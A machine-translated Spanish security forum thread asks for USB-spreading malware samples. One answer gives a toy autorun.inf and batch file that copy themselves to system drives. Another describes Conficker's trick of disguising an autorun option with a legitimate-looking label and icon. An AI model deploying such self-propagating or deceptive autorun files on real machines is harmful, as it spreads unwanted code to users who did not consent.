¿Ejemplo de malware que se propaga a través de USB? [cerrado]

Question

¿Ejemplo de malware que se propaga a través de USB? [cerrado]

#1 de Adnan (6 votos)
#2 de David Houde (2 votos)

3

Estoy jugando con Mandiant Redline en Windows Server 2012 en una máquina virtual y quería descargar un virus de muestra que se propaga a través de USB y modificarlo para atacar Mandiant Redline. Nunca antes había escrito malware, por lo que si alguien tiene un Guía o un enlace a una descarga donde puedo obtener una muestra como esta. Lo apreciaría.

¿Dónde puedo encontrar muestras de malware con una fuente que se propague a través de USB? ¿Dónde puedo encontrar un tutorial sobre cómo escribir malware para poder entender más sobre cómo funciona?

malware ids

pregunta gal 02.05.2013 - 19:31

fuente

2 respuestas

Lea otras preguntas en las etiquetas malware ids

Anulación de la validación de entrada de la aplicación web Firma de certificado SSL por una CA

score 6 · Answer 1

autorun.inf

[autorun]
open=file.bat
shell\option1=Open
shell\option1\command=file.bat

file.bat

@echo off
copy autorun.inf C:\ > NUL
copy file.bat C:\ > NUL
copy autorun.inf D:\ > NUL
copy file.bat D:\ > NUL
explorer .

Póngalos juntos y obtendrá algo que se propagará a través de USB.

En una nota más seria, no esperes que alguien te entregue una pieza de malware aquí.

score 2 · Answer 2

Solo quería tocar la publicación de Adnan. Ya que en el tema de la ejecución automática de USB, aquí hay un ejemplo del mundo real que utiliza el mismo esquema.

El reciente virus conficker utilizó la ejecución automática para infectar sistemas. Aunque no es completamente automático, se presenta como una opción legítima de ejecución automática que la mayoría de las personas está acostumbrada a elegir sin pensar mucho. Conficker usó un autorun.inf similar al anterior, con las líneas agregadas:

Action=Open folder to view files
Icon=%systemroot%\system32\shell32.dll,4

Como puede ver, cuando se inserta el dispositivo USB, Windows Autorun presenta al usuario la opción "Abrir carpeta para ver archivos" con el mismo icono que la opción legítima. Esta es una forma fácil de hacer que el usuario ejecute el código sin saberlo.